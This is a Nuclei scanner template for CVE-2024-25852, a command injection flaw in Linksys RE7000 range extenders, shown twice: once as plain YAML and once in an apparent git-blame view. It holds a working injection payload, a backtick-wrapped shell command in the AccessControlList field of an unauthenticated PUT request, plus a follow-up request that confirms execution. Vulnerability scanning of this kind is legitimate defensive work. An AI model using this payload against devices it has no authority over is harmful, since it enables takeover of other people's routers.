nuclei-templates/http/cves/2024/CVE-2024-25852.yaml

id: CVE-2024-25852

info:
  name: Linksys RE7000 - Command Injection
  author: securityforeveryone
  severity: high
  description: |
    Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the "AccessControlList" parameter of the access control function point
  impact: An attacker can use the vulnerability to obtain device administrator rights.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-25852
    - https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md
    - https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd
  classification:
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 1
    vendor: Linksys
    product: RE7000
  tags: cve,cve2024,unauth,injection

variables:
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        PUT /goform/AccessControl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`"}

  - raw:
      - |
        GET /{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1,"result","success") && contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")'
          - 'status_code_1 == 200 && status_code_2 == 200'
        condition: and
# digest: 490a0046304402202153b2db486cc766305d138e6eb3ee33f978bf43e3575d91cef771e7c0124c3102203c2180ccbd5399845dda7b300524f79435b3bef94e700d511e27e22f1abd9848:922c64590222798bb761d5b6d8e72950
add CVE-2024-25852 2024-07-04 14:26:09 +00:00			`id: CVE-2024-25852`

			`info:`
			`name: Linksys RE7000 - Command Injection`
			`author: securityforeveryone`
			`severity: high`
minor update 2024-07-06 01:02:56 +00:00			`description: \|`
			`Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the "AccessControlList" parameter of the access control function point`
			`impact: An attacker can use the vulnerability to obtain device administrator rights.`
add CVE-2024-25852 2024-07-04 14:26:09 +00:00			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2024-25852`
			`- https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md`
			`- https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd`
			`classification:`
			`epss-score: 0.00043`
			`epss-percentile: 0.0866`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`vendor: Linksys`
			`product: RE7000`
			`tags: cve,cve2024,unauth,injection`
minor update 2024-07-06 01:02:56 +00:00
add CVE-2024-25852 2024-07-04 14:26:09 +00:00			`variables:`
			`filename: "{{rand_base(5)}}"`

			`http:`
			`- raw:`
			`- \|`
			`PUT /goform/AccessControl HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			{"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`"}

			`- raw:`
			`- \|`
			`GET /{{filename}}.txt HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
minor update 2024-07-06 01:02:56 +00:00			`- 'contains_all(body_1,"result","success") && contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")'`
			`- 'status_code_1 == 200 && status_code_2 == 200'`
add CVE-2024-25852 2024-07-04 14:26:09 +00:00			`condition: and`
Auto Template Signing [Tue Jul 9 08:56:43 UTC 2024] :robot: 2024-07-09 08:56:43 +00:00			`# digest: 490a0046304402202153b2db486cc766305d138e6eb3ee33f978bf43e3575d91cef771e7c0124c3102203c2180ccbd5399845dda7b300524f79435b3bef94e700d511e27e22f1abd9848:922c64590222798bb761d5b6d8e72950`